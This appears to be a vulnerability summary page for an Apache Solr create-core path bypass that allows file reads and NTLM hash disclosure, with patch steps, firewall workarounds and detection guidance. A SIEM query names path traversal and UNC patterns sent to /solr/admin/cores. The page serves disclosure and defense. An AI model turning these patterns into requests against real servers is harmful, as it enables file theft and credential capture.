CVE-2026-22444
📋 TL;DR
This vulnerability in Apache Solr allows attackers to bypass path restrictions and read unauthorized files from the filesystem when creating new cores. On Windows systems, this can lead to NTLM hash disclosure. Affected systems are Solr deployments in standalone mode with allowPath restrictions and exposed create core API to untrusted users.
💻 Affected Systems
- Apache Solr
📦 What is this software?
Solr by Apache
⚠️ Risk & Real-World Impact
Worst Case
Attackers can read sensitive system files, access unauthorized configsets, and on Windows systems, capture NTLM hashes for credential theft and lateral movement.
Likely Case
Unauthorized access to Solr configsets and potential information disclosure from readable files within allowed paths.
If Mitigated
Minimal impact if proper authorization controls prevent untrusted users from accessing the create core API.
🎯 Exploit Status
Exploitation requires access to the create core API endpoint. No authentication bypass - requires existing API access.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Apache Solr 9.10.1 or greater
Vendor Advisory: https://lists.apache.org/thread/qkrb9dd4xrlqmmq73lrhkbfkttto2d1m
Restart Required: Yes
Instructions:
1. Download Apache Solr 9.10.1 or later from official Apache website. 2. Backup current Solr configuration and data. 3. Stop Solr service. 4. Replace Solr installation with patched version. 5. Restore configuration and data. 6. Start Solr service. 7. Verify version and functionality.
🔧 Temporary Workarounds
Enable and Configure RuleBasedAuthorizationPlugin
allEnable authorization plugin and restrict core creation to admin users only
Configure security.json to enable RuleBasedAuthorizationPlugin with proper permissions
Restrict API Access via Network Controls
linuxUse firewall rules to limit access to Solr API endpoints
iptables -A INPUT -p tcp --dport 8983 -s trusted_ips -j ACCEPT
iptables -A INPUT -p tcp --dport 8983 -j DROP
🧯 If You Can't Patch
- Enable RuleBasedAuthorizationPlugin and ensure only admin users have core-admin-edit permission
- Implement network segmentation to restrict access to Solr API from untrusted networks
🔍 How to Verify
Check if Vulnerable:
Check Solr version with 'solr version' command and verify if between 8.6 and 9.10.0. Check if running in standalone mode and if allowPath is configured.Check Version:
solr versionVerify Fix Applied:
Verify Solr version is 9.10.1 or higher with 'solr version'. Test create core API with restricted paths to ensure proper validation.📡 Detection & Monitoring
Log Indicators:
- Unauthorized file access attempts in Solr logs
- Core creation requests with unusual path parameters
- Failed authorization attempts for core-admin-edit operations
Network Indicators:
- HTTP POST requests to /solr/admin/cores with path traversal patterns
- Unusual UNC path requests from Windows clients
SIEM Query:
source="solr.log" AND ("create core" OR "admin/cores") AND (path_traversal OR "..\\" OR "../" OR "\\\\")